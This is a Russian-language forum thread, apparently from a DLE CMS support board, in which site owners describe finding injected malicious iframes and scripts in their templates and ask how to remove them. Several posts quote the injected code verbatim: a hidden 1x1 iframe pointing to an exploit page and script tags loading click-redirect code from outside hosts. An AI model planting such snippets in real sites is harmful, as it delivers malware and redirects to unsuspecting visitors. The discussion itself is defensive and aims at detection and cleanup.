xsash 9 Опубликовано: 7 марта 2007 Рассказать Опубликовано: 7 марта 2007 Автор Snow Land я говорил про вирус образно. я статью про них писал в секлабе, так что не надо блабла. что это такое я знаю. сам разрабатывал. просто при изменении части кода сигнатура изменяется, а раз в базе нет - значит "не вирус" Цитата Ссылка на сообщение Поделиться на других сайтах
Гость Автоответчик Опубликовано: 8 марта 2007 Рассказать Опубликовано: 8 марта 2007 <#thank#> Цитата Ссылка на сообщение Поделиться на других сайтах
mcaiZer77 0 Опубликовано: 11 марта 2007 Рассказать Опубликовано: 11 марта 2007 xsash, 5) поменяйте браузер с IE6Перейти на него(если юзаете другой) или наоброт сойти(если юзаетен IE6)? Цитата Ссылка на сообщение Поделиться на других сайтах
Stude_nt 0 Опубликовано: 11 марта 2007 Рассказать Опубликовано: 11 марта 2007 mcaiZer77, Лучше перейти на что нибудь типа Opera, т.к. всю пакость расчитывают на большенство (а это IE6) Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 11 марта 2007 Рассказать Опубликовано: 11 марта 2007 Автор конечно "С" него. опера лучше. ошибок для нее не было найдено уже достаточно долго в отличиие от FF. ps. только полемику разводить не нужно у "кого длиннее". каждый выбирает сам Цитата Ссылка на сообщение Поделиться на других сайтах
sklazer 0 Опубликовано: 13 марта 2007 Рассказать Опубликовано: 13 марта 2007 Слушайте, а не может ли появиться iframe из-за того, что у админа null версия движка( это я не про себя, а про друга - он спрашивает ) Цитата Ссылка на сообщение Поделиться на других сайтах
EVRIAL 0 Опубликовано: 13 марта 2007 Рассказать Опубликовано: 13 марта 2007 Слушайте, а не может ли появиться iframe из-за того, что у админа null версия движка( это я не про себя, а про друга - он спрашивает ) Конечно может. Доверяй, но проверяй. Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 13 марта 2007 Рассказать Опубликовано: 13 марта 2007 Автор а почему нет? просто ктото в нулл вставил код стучалки, вот ему она и будет отстукивать какой пароль у админа сайта с нуллом Цитата Ссылка на сообщение Поделиться на других сайтах
sergey78 18 Опубликовано: 14 марта 2007 Рассказать Опубликовано: 14 марта 2007 Народу становится все больше, тех кто понимает чтото в php и вообще сети (с точки зрения матчасти) все меньше. Вероятно тут есть обратная зависимость =\ Итак. если Вы нашли на своем сайте код типа <iframe src=http://***/***/ex.php border=0 width=1 height=1></iframe> или <script src=http://***/load.js></script> (иногда такой код просто зашифрован яваскриптами - для невозможности прочтения) мои поздравления Вот и у меня появился первый опыт. Сегодня нашел: <!-- ~ --><iframe src='http://coco32.org/o/exp/' frameborder=0 width=1 height=1></iframe> Он мне на рабочий стол добавлял файлы download.exe, googletoolbar.exe, cstike.exe.... Мусор удалил, пароли сменил, хостеру сказал. Вопрос: где еще может быть такая гадость кроме index.php ? Celsoft, Почему не сделать в админке: «Hello admin, последний раз вы заходили 12.03.2007 в 19:32 с IP 198.198.198.198» Эта запись в базу делалась бы при логине админа. Должно работать нормально, если включен сброс авторизации (в новых версиях DLE). Цитата Ссылка на сообщение Поделиться на других сайтах
dmc 0 Опубликовано: 14 марта 2007 Рассказать Опубликовано: 14 марта 2007 Вопрос: где еще может быть такая гадость кроме index.php ? у меня было в /engine/cache/system/banner.php Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 27 марта 2007 Рассказать Опубликовано: 27 марта 2007 Читаем: http://www.viruslist.com/ru/weblog http://masterlink.art-neon.net/index.php?a...page;topic=30.0 Что бы такая бяка не портила скрипты, можно на них поставить chmod 444, по крайней мере на index.php, если его изменяете не часто. Цитата Ссылка на сообщение Поделиться на других сайтах
stud_muffler 0 Опубликовано: 13 апреля 2007 Рассказать Опубликовано: 13 апреля 2007 На двух ДЛЕ сайтах (в.5.0 и 4.0) iframe были прописаны после тэга body в файлах main.tpl во всех шаблонах. Цитата Ссылка на сообщение Поделиться на других сайтах
Alexandr 1 Опубликовано: 14 апреля 2007 Рассказать Опубликовано: 14 апреля 2007 А у меня иногда, где раз в два дня вылезит с верху сайта реклама Lovplenet да такой большой банер, я страницу перезагружаю, и он исчезает и долго его не видно, подозреваю что это проблемы с хостером. НУ если был бы фрейм он бы постоянно грузился Цитата Ссылка на сообщение Поделиться на других сайтах
Alexandr 1 Опубликовано: 15 апреля 2007 Рассказать Опубликовано: 15 апреля 2007 А у меня иногда, где раз в два дня вылезит с верху сайта реклама Lovplenet да такой большой банер, я страницу перезагружаю, и он исчезает и долго его не видно, подозреваю что это проблемы с хостером. НУ если был бы фрейм он бы постоянно грузился Ксати сегодня этот прикол с тем же баннером ловплэнэта я увидел на 4dle.ru Значит хостер воду мутит к нему и надо стучать. и еще странно у 4ДЛЕ другой хост а у меня другой. Цитата Ссылка на сообщение Поделиться на других сайтах
shoked 0 Опубликовано: 15 апреля 2007 Рассказать Опубликовано: 15 апреля 2007 это вроде бегун че то мутит... убрал его код, баннер пропал, короче хз Цитата Ссылка на сообщение Поделиться на других сайтах
Alexandr 1 Опубликовано: 15 апреля 2007 Рассказать Опубликовано: 15 апреля 2007 это вроде бегун че то мутит... убрал его код, баннер пропал, короче хз Да ну бегун наврятли. Код ковсем в друго месте. да и не думаю что бегун будет себе репутацию портить и тем более что этот баннер вылазиет редко . Цитата Ссылка на сообщение Поделиться на других сайтах
shoked 0 Опубликовано: 15 апреля 2007 Рассказать Опубликовано: 15 апреля 2007 да точно он Цитата Ссылка на сообщение Поделиться на других сайтах
sergeant Raven 2 Опубликовано: 16 апреля 2007 Рассказать Опубликовано: 16 апреля 2007 это от бегуна вылазит... Цитата Ссылка на сообщение Поделиться на других сайтах
Alexandr 1 Опубликовано: 16 апреля 2007 Рассказать Опубликовано: 16 апреля 2007 shoked как часто он вылазиет. И вообще кто как думает бегун признается об этом или нет, если ему написать Цитата Ссылка на сообщение Поделиться на других сайтах
sergeant Raven 2 Опубликовано: 16 апреля 2007 Рассказать Опубликовано: 16 апреля 2007 вылазит по разному... от 3 раз в день до... писать им не пробовал... Цитата Ссылка на сообщение Поделиться на других сайтах
leksey 0 Опубликовано: 4 января 2011 Рассказать Опубликовано: 4 января 2011 решил откапать старую тему сайт www.rumontazh.ru, обновился до 9,2 все проверил антивирусом, но все равно при заходе на сайт при кликам по внутренним страницам происходит пересылка на другой сайт. что за вирус сидит? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 4 января 2011 Рассказать Опубликовано: 4 января 2011 leksey, из своих шаблонов удаляйте скрипты, в частности </script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script> Цитата Ссылка на сообщение Поделиться на других сайтах
leksey 0 Опубликовано: 4 января 2011 Рассказать Опубликовано: 4 января 2011 leksey, из своих шаблонов удаляйте скрипты, в частности </script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script> Вроде не нашел никаких подозрительных скриптов, может не так смотрю Цитата Ссылка на сообщение Поделиться на других сайтах
zgr 72 Опубликовано: 5 января 2011 Рассказать Опубликовано: 5 января 2011 (изменено) <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7833"></script> <script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script> Чего за мусор? Сделал для своих нужд простенький сервис по пробивке всех нюансов (парсинг всего на сайте), позволяет быстро найти гадости, если таковые имеются, правда, не все работает еще, некогда заниматься, если устроит, юзайте в помощь: isle-arch.ru (пока только ссылки и меты). Изменено 5 января 2011 пользователем zgr Цитата Ссылка на сообщение Поделиться на других сайтах
leksey 0 Опубликовано: 5 января 2011 Рассказать Опубликовано: 5 января 2011 leksey, из своих шаблонов удаляйте скрипты, в частности </script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script> Вроде не нашел никаких подозрительных скриптов, может не так смотрю Или перефразирую вопрос, как это сделать? Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.